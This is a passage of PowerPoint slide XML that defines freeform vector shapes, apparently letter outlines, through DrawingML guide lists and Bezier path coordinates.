                <a:gd name="T3" fmla="*/ 30 h 304"/>
                <a:gd name="T4" fmla="*/ 199 w 234"/>
                <a:gd name="T5" fmla="*/ 30 h 304"/>
                <a:gd name="T6" fmla="*/ 220 w 234"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 199 w 234"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 147 w 234"/>
                <a:gd name="T11" fmla="*/ 0 h 304"/>
                <a:gd name="T12" fmla="*/ 127 w 234"/>
                <a:gd name="T13" fmla="*/ 15 h 304"/>
                <a:gd name="T14" fmla="*/ 150 w 234"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 115 w 234"/>
                <a:gd name="T17" fmla="*/ 103 h 304"/>
                <a:gd name="T18" fmla="*/ 76 w 234"/>
                <a:gd name="T19" fmla="*/ 30 h 304"/>
                <a:gd name="T20" fmla="*/ 98 w 234"/>
                <a:gd name="T21" fmla="*/ 15 h 304"/>
                <a:gd name="T22" fmla="*/ 78 w 234"/>
                <a:gd name="T23" fmla="*/ 0 h 304"/>
                <a:gd name="T24" fmla="*/ 26 w 234"/>
                <a:gd name="T25" fmla="*/ 0 h 304"/>
                <a:gd name="T26" fmla="*/ 6 w 234"/>
                <a:gd name="T27" fmla="*/ 15 h 304"/>
                <a:gd name="T28" fmla="*/ 26 w 234"/>
                <a:gd name="T29" fmla="*/ 30 h 304"/>
                <a:gd name="T30" fmla="*/ 38 w 234"/>
                <a:gd name="T31" fmla="*/ 30 h 304"/>
                <a:gd name="T32" fmla="*/ 97 w 234"/>
                <a:gd name="T33" fmla="*/ 142 h 304"/>
                <a:gd name="T34" fmla="*/ 31 w 234"/>
                <a:gd name="T35" fmla="*/ 274 h 304"/>
                <a:gd name="T36" fmla="*/ 20 w 234"/>
                <a:gd name="T37" fmla="*/ 274 h 304"/>
                <a:gd name="T38" fmla="*/ 0 w 234"/>
                <a:gd name="T39" fmla="*/ 289 h 304"/>
                <a:gd name="T40" fmla="*/ 20 w 234"/>
                <a:gd name="T41" fmla="*/ 304 h 304"/>
                <a:gd name="T42" fmla="*/ 72 w 234"/>
                <a:gd name="T43" fmla="*/ 304 h 304"/>
                <a:gd name="T44" fmla="*/ 92 w 234"/>
                <a:gd name="T45" fmla="*/ 289 h 304"/>
                <a:gd name="T46" fmla="*/ 69 w 234"/>
                <a:gd name="T47" fmla="*/ 274 h 304"/>
                <a:gd name="T48" fmla="*/ 115 w 234"/>
                <a:gd name="T49" fmla="*/ 177 h 304"/>
                <a:gd name="T50" fmla="*/ 164 w 234"/>
                <a:gd name="T51" fmla="*/ 274 h 304"/>
                <a:gd name="T52" fmla="*/ 142 w 234"/>
                <a:gd name="T53" fmla="*/ 289 h 304"/>
                <a:gd name="T54" fmla="*/ 162 w 234"/>
                <a:gd name="T55" fmla="*/ 304 h 304"/>
                <a:gd name="T56" fmla="*/ 214 w 234"/>
                <a:gd name="T57" fmla="*/ 304 h 304"/>
                <a:gd name="T58" fmla="*/ 234 w 234"/>
                <a:gd name="T59" fmla="*/ 289 h 304"/>
                <a:gd name="T60" fmla="*/ 214 w 234"/>
                <a:gd name="T61" fmla="*/ 274 h 304"/>
                <a:gd name="T62" fmla="*/ 202 w 234"/>
                <a:gd name="T63" fmla="*/ 274 h 304"/>
                <a:gd name="T64" fmla="*/ 132 w 234"/>
                <a:gd name="T65" fmla="*/ 14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4" h="304">
                  <a:moveTo>
                    <a:pt x="132" y="142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="188" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="30"/>
                    <a:pt x="220" y="30"/>
                    <a:pt x="220" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="0"/>
                    <a:pt x="207" y="0"/>
                    <a:pt x="199" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="147" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="0"/>
                    <a:pt x="127" y="0"/>
                    <a:pt x="127" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="30"/>
                    <a:pt x="139" y="30"/>
                    <a:pt x="150" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="85" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="6" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="30"/>
                    <a:pt x="19" y="30"/>
                    <a:pt x="26" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="304"/>
                    <a:pt x="92" y="304"/>
                    <a:pt x="92" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="274"/>
                    <a:pt x="80" y="274"/>
                    <a:pt x="69" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="274"/>
                    <a:pt x="142" y="274"/>
                    <a:pt x="142" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="304"/>
                    <a:pt x="154" y="304"/>
                    <a:pt x="162" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="214" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="304"/>
                    <a:pt x="234" y="304"/>
                    <a:pt x="234" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="274"/>
                    <a:pt x="221" y="274"/>
                    <a:pt x="214" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132" y="14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2" name="Freeform 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF3CBBB-6114-4800-8319-B39106AD848B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId34"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5199064" y="2800350"/>
              <a:ext cx="88900" cy="139700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 122 w 210"/>
                <a:gd name="T1" fmla="*/ 174 h 316"/>
                <a:gd name="T2" fmla="*/ 177 w 210"/>
                <a:gd name="T3" fmla="*/ 230 h 316"/>
                <a:gd name="T4" fmla="*/ 116 w 210"/>
                <a:gd name="T5" fmla="*/ 285 h 316"/>
                <a:gd name="T6" fmla="*/ 58 w 210"/>
                <a:gd name="T7" fmla="*/ 270 h 316"/>
                <a:gd name="T8" fmla="*/ 35 w 210"/>
                <a:gd name="T9" fmla="*/ 227 h 316"/>
                <a:gd name="T10" fmla="*/ 18 w 210"/>
                <a:gd name="T11" fmla="*/ 209 h 316"/>
                <a:gd name="T12" fmla="*/ 0 w 210"/>
                <a:gd name="T13" fmla="*/ 230 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 210"/>
                <a:gd name="T15" fmla="*/ 295 h 316"/>
                <a:gd name="T16" fmla="*/ 15 w 210"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 34 w 210"/>
                <a:gd name="T19" fmla="*/ 293 h 316"/>
                <a:gd name="T20" fmla="*/ 116 w 210"/>
                <a:gd name="T21" fmla="*/ 316 h 316"/>
                <a:gd name="T22" fmla="*/ 210 w 210"/>
                <a:gd name="T23" fmla="*/ 228 h 316"/>
                <a:gd name="T24" fmla="*/ 186 w 210"/>
                <a:gd name="T25" fmla="*/ 168 h 316"/>
                <a:gd name="T26" fmla="*/ 113 w 210"/>
                <a:gd name="T27" fmla="*/ 136 h 316"/>
                <a:gd name="T28" fmla="*/ 72 w 210"/>
                <a:gd name="T29" fmla="*/ 127 h 316"/>
                <a:gd name="T30" fmla="*/ 33 w 210"/>
                <a:gd name="T31" fmla="*/ 80 h 316"/>
                <a:gd name="T32" fmla="*/ 92 w 210"/>
                <a:gd name="T33" fmla="*/ 31 h 316"/>
                <a:gd name="T34" fmla="*/ 162 w 210"/>
                <a:gd name="T35" fmla="*/ 93 h 316"/>
                <a:gd name="T36" fmla="*/ 179 w 210"/>
                <a:gd name="T37" fmla="*/ 107 h 316"/>
                <a:gd name="T38" fmla="*/ 196 w 210"/>
                <a:gd name="T39" fmla="*/ 86 h 316"/>
                <a:gd name="T40" fmla="*/ 196 w 210"/>
                <a:gd name="T41" fmla="*/ 21 h 316"/>
                <a:gd name="T42" fmla="*/ 181 w 210"/>
                <a:gd name="T43" fmla="*/ 0 h 316"/>
                <a:gd name="T44" fmla="*/ 163 w 210"/>
                <a:gd name="T45" fmla="*/ 24 h 316"/>
                <a:gd name="T46" fmla="*/ 93 w 210"/>
                <a:gd name="T47" fmla="*/ 0 h 316"/>
                <a:gd name="T48" fmla="*/ 0 w 210"/>
                <a:gd name="T49" fmla="*/ 82 h 316"/>
                <a:gd name="T50" fmla="*/ 64 w 210"/>
                <a:gd name="T51" fmla="*/ 160 h 316"/>
                <a:gd name="T52" fmla="*/ 122 w 210"/>
                <a:gd name="T53" fmla="*/ 17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0" h="316">
                  <a:moveTo>
                    <a:pt x="122" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="177"/>
                    <a:pt x="177" y="187"/>
                    <a:pt x="177" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="256"/>
                    <a:pt x="156" y="285"/>
                    <a:pt x="116" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="285"/>
                    <a:pt x="78" y="283"/>
                    <a:pt x="58" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="256"/>
                    <a:pt x="35" y="236"/>
                    <a:pt x="35" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="218"/>
                    <a:pt x="34" y="209"/>
                    <a:pt x="18" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="209"/>
                    <a:pt x="0" y="220"/>
                    <a:pt x="0" y="230"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="295"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="303"/>
                    <a:pt x="0" y="316"/>
                    <a:pt x="15" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="316"/>
                    <a:pt x="29" y="309"/>
                    <a:pt x="34" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="308"/>
                    <a:pt x="84" y="316"/>
                    <a:pt x="116" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="316"/>
                    <a:pt x="210" y="272"/>
                    <a:pt x="210" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="196"/>
                    <a:pt x="192" y="175"/>
                    <a:pt x="186" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="148"/>
                    <a:pt x="152" y="145"/>
                    <a:pt x="113" y="136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="127"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="121"/>
                    <a:pt x="33" y="103"/>
                    <a:pt x="33" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="54"/>
                    <a:pt x="57" y="31"/>
                    <a:pt x="92" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="31"/>
                    <a:pt x="159" y="77"/>
                    <a:pt x="162" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="104"/>
                    <a:pt x="169" y="107"/>
                    <a:pt x="179" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="107"/>
                    <a:pt x="196" y="96"/>
                    <a:pt x="196" y="86"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="196" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="13"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="181" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="0"/>
                    <a:pt x="167" y="9"/>
                    <a:pt x="163" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="6"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="93" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="0"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="115"/>
                    <a:pt x="23" y="148"/>
                    <a:pt x="64" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="161"/>
                    <a:pt x="115" y="172"/>
                    <a:pt x="122" y="17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3" name="Freeform 134">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2548FA4B-F6AF-4A96-B711-123266215AE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId35"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5310189" y="2800350"/>
              <a:ext cx="88900" cy="139700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 121 w 209"/>
                <a:gd name="T1" fmla="*/ 174 h 316"/>
                <a:gd name="T2" fmla="*/ 177 w 209"/>
                <a:gd name="T3" fmla="*/ 230 h 316"/>
                <a:gd name="T4" fmla="*/ 116 w 209"/>
                <a:gd name="T5" fmla="*/ 285 h 316"/>
                <a:gd name="T6" fmla="*/ 57 w 209"/>
                <a:gd name="T7" fmla="*/ 270 h 316"/>
                <a:gd name="T8" fmla="*/ 34 w 209"/>
                <a:gd name="T9" fmla="*/ 227 h 316"/>
                <a:gd name="T10" fmla="*/ 17 w 209"/>
                <a:gd name="T11" fmla="*/ 209 h 316"/>
                <a:gd name="T12" fmla="*/ 0 w 209"/>
                <a:gd name="T13" fmla="*/ 230 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 209"/>
                <a:gd name="T15" fmla="*/ 295 h 316"/>
                <a:gd name="T16" fmla="*/ 15 w 209"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 33 w 209"/>
                <a:gd name="T19" fmla="*/ 293 h 316"/>
                <a:gd name="T20" fmla="*/ 115 w 209"/>
                <a:gd name="T21" fmla="*/ 316 h 316"/>
                <a:gd name="T22" fmla="*/ 209 w 209"/>
                <a:gd name="T23" fmla="*/ 228 h 316"/>
                <a:gd name="T24" fmla="*/ 185 w 209"/>
                <a:gd name="T25" fmla="*/ 168 h 316"/>
                <a:gd name="T26" fmla="*/ 112 w 209"/>
                <a:gd name="T27" fmla="*/ 136 h 316"/>
                <a:gd name="T28" fmla="*/ 72 w 209"/>
                <a:gd name="T29" fmla="*/ 127 h 316"/>
                <a:gd name="T30" fmla="*/ 32 w 209"/>
                <a:gd name="T31" fmla="*/ 80 h 316"/>
                <a:gd name="T32" fmla="*/ 92 w 209"/>
                <a:gd name="T33" fmla="*/ 31 h 316"/>
                <a:gd name="T34" fmla="*/ 161 w 209"/>
                <a:gd name="T35" fmla="*/ 93 h 316"/>
                <a:gd name="T36" fmla="*/ 178 w 209"/>
                <a:gd name="T37" fmla="*/ 107 h 316"/>
                <a:gd name="T38" fmla="*/ 196 w 209"/>
                <a:gd name="T39" fmla="*/ 86 h 316"/>
                <a:gd name="T40" fmla="*/ 196 w 209"/>
                <a:gd name="T41" fmla="*/ 21 h 316"/>
                <a:gd name="T42" fmla="*/ 181 w 209"/>
                <a:gd name="T43" fmla="*/ 0 h 316"/>
                <a:gd name="T44" fmla="*/ 162 w 209"/>
                <a:gd name="T45" fmla="*/ 24 h 316"/>
                <a:gd name="T46" fmla="*/ 92 w 209"/>
                <a:gd name="T47" fmla="*/ 0 h 316"/>
                <a:gd name="T48" fmla="*/ 0 w 209"/>
                <a:gd name="T49" fmla="*/ 82 h 316"/>
                <a:gd name="T50" fmla="*/ 64 w 209"/>
                <a:gd name="T51" fmla="*/ 160 h 316"/>
                <a:gd name="T52" fmla="*/ 121 w 209"/>
                <a:gd name="T53" fmla="*/ 17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9" h="316">
                  <a:moveTo>
                    <a:pt x="121" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="177"/>
                    <a:pt x="177" y="187"/>
                    <a:pt x="177" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="256"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="116" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="285"/>
                    <a:pt x="77" y="283"/>
                    <a:pt x="57" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="256"/>
                    <a:pt x="35" y="236"/>
                    <a:pt x="34" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="218"/>
                    <a:pt x="33" y="209"/>
                    <a:pt x="17" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="209"/>
                    <a:pt x="0" y="220"/>
                    <a:pt x="0" y="230"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="295"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="303"/>
                    <a:pt x="0" y="316"/>
                    <a:pt x="15" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="316"/>
                    <a:pt x="29" y="309"/>
                    <a:pt x="33" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="308"/>
                    <a:pt x="83" y="316"/>
                    <a:pt x="115" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="316"/>
                    <a:pt x="209" y="272"/>
                    <a:pt x="209" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="196"/>
                    <a:pt x="191" y="175"/>
                    <a:pt x="185" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="148"/>
                    <a:pt x="151" y="145"/>
                    <a:pt x="112" y="136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="127"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="121"/>
                    <a:pt x="32" y="103"/>
                    <a:pt x="32" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="54"/>
                    <a:pt x="57" y="31"/>
                    <a:pt x="92" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="31"/>
                    <a:pt x="158" y="77"/>
                    <a:pt x="161" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="104"/>
                    <a:pt x="168" y="107"/>
                    <a:pt x="178" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="107"/>
                    <a:pt x="196" y="96"/>
                    <a:pt x="196" y="86"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="196" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="13"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="181" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="0"/>
                    <a:pt x="166" y="9"/>
                    <a:pt x="162" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="6"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="92" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="0"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="115"/>
                    <a:pt x="23" y="148"/>
                    <a:pt x="64" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="161"/>
                    <a:pt x="114" y="172"/>
                    <a:pt x="121" y="17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4" name="Freeform 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F42E404B-C38F-4639-9C6D-B07661BBC879}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId36"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5416551" y="2803525"/>
              <a:ext cx="96838" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 73 w 228"/>
                <a:gd name="T1" fmla="*/ 30 h 304"/>
                <a:gd name="T2" fmla="*/ 101 w 228"/>
                <a:gd name="T3" fmla="*/ 30 h 304"/>
                <a:gd name="T4" fmla="*/ 121 w 228"/>
                <a:gd name="T5" fmla="*/ 15 h 304"/>
                <a:gd name="T6" fmla="*/ 101 w 228"/>
                <a:gd name="T7" fmla="*/ 0 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 228"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 0 w 228"/>
                <a:gd name="T11" fmla="*/ 15 h 304"/>
                <a:gd name="T12" fmla="*/ 20 w 228"/>
                <a:gd name="T13" fmla="*/ 30 h 304"/>
                <a:gd name="T14" fmla="*/ 39 w 228"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 39 w 228"/>
                <a:gd name="T17" fmla="*/ 274 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 228"/>
                <a:gd name="T19" fmla="*/ 274 h 304"/>
                <a:gd name="T20" fmla="*/ 0 w 228"/>
                <a:gd name="T21" fmla="*/ 289 h 304"/>
                <a:gd name="T22" fmla="*/ 20 w 228"/>
                <a:gd name="T23" fmla="*/ 304 h 304"/>
                <a:gd name="T24" fmla="*/ 208 w 228"/>
                <a:gd name="T25" fmla="*/ 304 h 304"/>
                <a:gd name="T26" fmla="*/ 228 w 228"/>
                <a:gd name="T27" fmla="*/ 284 h 304"/>
                <a:gd name="T28" fmla="*/ 228 w 228"/>
                <a:gd name="T29" fmla="*/ 240 h 304"/>
                <a:gd name="T30" fmla="*/ 211 w 228"/>
                <a:gd name="T31" fmla="*/ 219 h 304"/>
                <a:gd name="T32" fmla="*/ 193 w 228"/>
                <a:gd name="T33" fmla="*/ 240 h 304"/>
                <a:gd name="T34" fmla="*/ 193 w 228"/>
                <a:gd name="T35" fmla="*/ 274 h 304"/>
                <a:gd name="T36" fmla="*/ 73 w 228"/>
                <a:gd name="T37" fmla="*/ 274 h 304"/>
                <a:gd name="T38" fmla="*/ 73 w 228"/>
                <a:gd name="T39" fmla="*/ 3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8" h="304">
                  <a:moveTo>
                    <a:pt x="73" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="101" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="30"/>
                    <a:pt x="121" y="30"/>
                    <a:pt x="121" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="0"/>
                    <a:pt x="108" y="0"/>
                    <a:pt x="101" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="208" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="304"/>
                    <a:pt x="228" y="300"/>
                    <a:pt x="228" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="228" y="240"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="230"/>
                    <a:pt x="228" y="219"/>
                    <a:pt x="211" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="219"/>
                    <a:pt x="193" y="229"/>
                    <a:pt x="193" y="240"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="193" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73"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 name="Freeform 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0949BE-DD3B-4E02-B499-45C36BB106C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId37"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5532439" y="2841625"/>
              <a:ext cx="98425" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
